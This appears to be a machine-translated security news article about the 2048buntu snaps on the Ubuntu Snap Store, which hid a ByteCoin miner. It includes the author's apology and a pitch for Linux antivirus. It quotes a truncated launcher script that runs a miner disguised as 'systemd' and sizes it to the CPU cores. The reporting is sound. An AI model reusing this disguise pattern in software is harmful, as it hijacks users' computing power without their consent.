ByteCoin cryptocurrency for Linux smuggled in an application from the Ubuntu Snap Store

Almost 14 million unique malware samples - this is what the AV-Test test lab collected in the last year, which publishes information about collections taken from honeypots of computer viruses. Linux even has nothing to compare to Windows or macOS (not to mention Android), but from time to time there are ways to steal files from the disk. In any case, the upcoming RODO / GDPR law forces entrepreneurs to change the way personal data is processed, regardless of the operating system.

Undeniably, Windows reigns on desktops, but a much wider overtone in the media gains Linux, when there will be a similar threat to Windows. Some time ago vulnerabilities revealed to Linux: CVE-2017-5123, CVE-2017-6074, CVE-2014-9322, CVE-2017-1000112 could seriously compromise the security of this platform. These real exploits used for attacks through the above-mentioned CVE could lead to root privileges.

Malicious script in an application with Ubuntu Snap Store

Described as the first malware on Linux - a malicious script (bloatware) - found itself in the Ubuntu Snap Store in the form of the application "2048buntu", which has already been removed with all other programs of the same author. Interestingly, the other applications of Nicolas Tomby also contained malicious scripts extracting the ByteCoin cryptocurrency. The author, contradicted by what he did, apologized and informed that all the funds will be transferred to the Ubuntu foundation account:

Koparka kryptowaluty ByteCoin na Linuxa przemycona w aplikacji z Ubuntu Snap Store

Good day. In reference with my applications in the snappy store, I wanted to explain that it was my way of monetizing the software. Reading the comments, I understand that this may have caused indignation, especially since I did not inform about it in the description.

I applied to mine account so that the users who downloaded games did not dig it anymore. The collected cryptocurrencies can be transferred to the Ubuntu foundation as compensation for users.

By the way, it should be noted that such situations may happen more often (not from my side). Maybe I could help in securing this.

It's not Canonical's fault or snappy packages (in flatpak it is possible). Closed software will always do something that you can not influence.

I'm sorry.

Infected applications contained a script that initiated automatic code loading during the operating system startup, which allowed to use the computing power of the computer in the background:



{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u [email protected] --$currency 1
    /snap/$name/current/systemd -u [email protected] --$currency 2

Applications appeared in the repository at the end of April. Canonical does not maintain such statistics, so it is difficult to estimate how many users downloaded and installed this mediocre quality of programs.

How is it possible that the programs are in the official Canonicala repository? Well, all applications sent to the store undergo automatic tests (similar to Google Play or iOS App Store) to ensure their correct installation for users using different Linux distributions. Nicolas' applications were sent as proprietary software, so the security of the code could not be verified.

Antivirus software for Linux

We are dealing here with an analogous situation like on Android, when malware gets into the system through user actions. The owner of the device, living in a mistaken belief that the malware does not exist on his operating system, installs - as it turns out later - an application that hides his true intentions from him.

This situation could have been prevented by installing antivirus software before. Maybe it sounds a bit strange, but the SNAP format of installation packages that contain all dependencies (something like EXE or MSI in Windows) allows you to install the program on any Linux distribution. On the other hand, the safety of users depends on the owners of the Ubuntu Snap Store. And from experience on the example of Google Play, you yourself know that this is a very infected source of "safe" Android programs. Did Ubuntu Snap Store share the fate of Google Play?

The presence of antivirus software will not eliminate all threats, but in the most-needed areas will block the possibility of performing a potential attack. Besides, anti-viruses on Linux are making more sense in business environments and not just on file servers. They are very much needed on workstations, because in addition to protection, they help administrators to control BYOD and Shadow IT. In addition, they control access to peripherals, data and Internet resources.

If we were to recommend an antivirus program on Linux, free Sophos Antivirus for Linux is a reasonable choice for home users. More information about version 9 of the Sophos anti-virus here and here.

Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.